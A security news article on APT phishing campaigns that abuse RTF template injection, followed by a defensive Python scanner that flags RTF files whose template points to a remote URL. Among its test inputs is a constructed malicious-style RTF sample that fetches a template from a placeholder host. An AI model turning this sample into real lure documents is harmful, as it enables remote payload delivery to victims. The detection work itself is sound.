Cybercrime, APTs’ latest weapon is RTF template injection

Proofpoint: APTs’ latest weapon is RTF template injection. Groups from India, Russia and China exploit this technique. The files have a low detection rate with public antivirus engines.

RTF template injection has become one of the most effective weapons in the APT arsenal. The technique was documented by Proofpoint cybersecurity researchers. It leverages legitimate RTF template functionality: by subverting the plain-text document-formatting properties of an RTF file, it uses the RTF template control word to retrieve a URL resource instead of a local file resource. This lets a threat actor replace a legitimate file destination with a URL from which a remote payload may be retrieved. Moreover, RTF template injection files often have a lower detection rate with public antivirus engines than files using the Office-based template injection technique. Researchers identified distinct phishing campaigns using the technique and attributed them to a diverse set of APT threat actors in the wild, particularly from India, Russia and China.
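The defensive check that follows from the description above is to look at where an RTF file's template control word points. The script below is an added example written for this article; it is not Proofpoint's tooling or code from the report. It assumes a simplified, regex-based reading of the `{\*\template ...}` destination group (a full RTF parser would be more robust), and the two RTF documents it scans are constructed here, with `example.invalid` as a placeholder host.

```python
import re
from typing import Optional

# Matches the RTF template destination group, e.g. {\*\template C:\\path\\Normal.dotm}.
# The inner group accepts escaped characters (\\, \{, \}, \'hh) so an escaped brace
# does not end the match early. Assumption: a simplified parser, not a full RTF reader.
TEMPLATE_RE = re.compile(rb"\{\\\*\\template((?:\\.|[^}\\])*)\}", re.DOTALL)

# RTF escapes that can appear inside the destination text.
ESCAPE_RE = re.compile(rb"\\'([0-9a-fA-F]{2})|\\([\\{}])")


def _unescape(raw: bytes) -> bytes:
    """Decode RTF \\'hh hex escapes and the \\\\ \\{ \\} literal escapes in one pass."""
    def repl(m: "re.Match[bytes]") -> bytes:
        if m.group(1):
            return bytes.fromhex(m.group(1).decode("ascii"))
        return m.group(2)
    return ESCAPE_RE.sub(repl, raw)


def extract_template_target(rtf_bytes: bytes) -> Optional[str]:
    """Return the decoded template destination, or None if the file has no template group."""
    m = TEMPLATE_RE.search(rtf_bytes)
    if not m:
        return None
    return _unescape(m.group(1)).decode("latin-1").strip()


def is_remote_template(target: Optional[str]) -> bool:
    """True when the template destination is a URL or a UNC share rather than a local path.

    A benign document produced by Word points at a local .dotm file; a URL destination is the
    marker of the template injection technique described in the article.
    """
    if target is None:
        return False
    lowered = target.lower()
    return lowered.startswith(("http://", "https://", "\\\\"))


def scan_rtf(rtf_bytes: bytes) -> dict:
    """Summarise one RTF document: its template target (if any) and whether it is remote."""
    target = extract_template_target(rtf_bytes)
    return {"template": target, "remote": is_remote_template(target)}


# Constructed sample documents (not real samples from the report).
BENIGN_RTF = (
    rb"{\rtf1\ansi\deff0{\fonttbl{\f0 Calibri;}}"
    rb"{\*\template C:\\Users\\alice\\Templates\\Normal.dotm}"
    rb"\pard Quarterly report body text.\par}"
)
SUSPICIOUS_RTF = (
    rb"{\rtf1\ansi\deff0{\fonttbl{\f0 Calibri;}}"
    rb"{\*\template http://example.invalid/lure/template.dotm}"
    rb"\pard Quarterly report body text.\par}"
)

if __name__ == "__main__":
    for name, doc in (("benign", BENIGN_RTF), ("suspicious", SUSPICIOUS_RTF)):
        result = scan_rtf(doc)
        verdict = "REMOTE TEMPLATE - review" if result["remote"] else "local template"
        print(f"{name:10s} template={result['template']!r} -> {verdict}")
```

Run it over a directory of `.rtf` attachments pulled from a mail gateway or sandbox and alert on any document whose template destination resolves to a URL; a local path is what Word itself writes, so the URL case is the anomaly worth a ticket.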

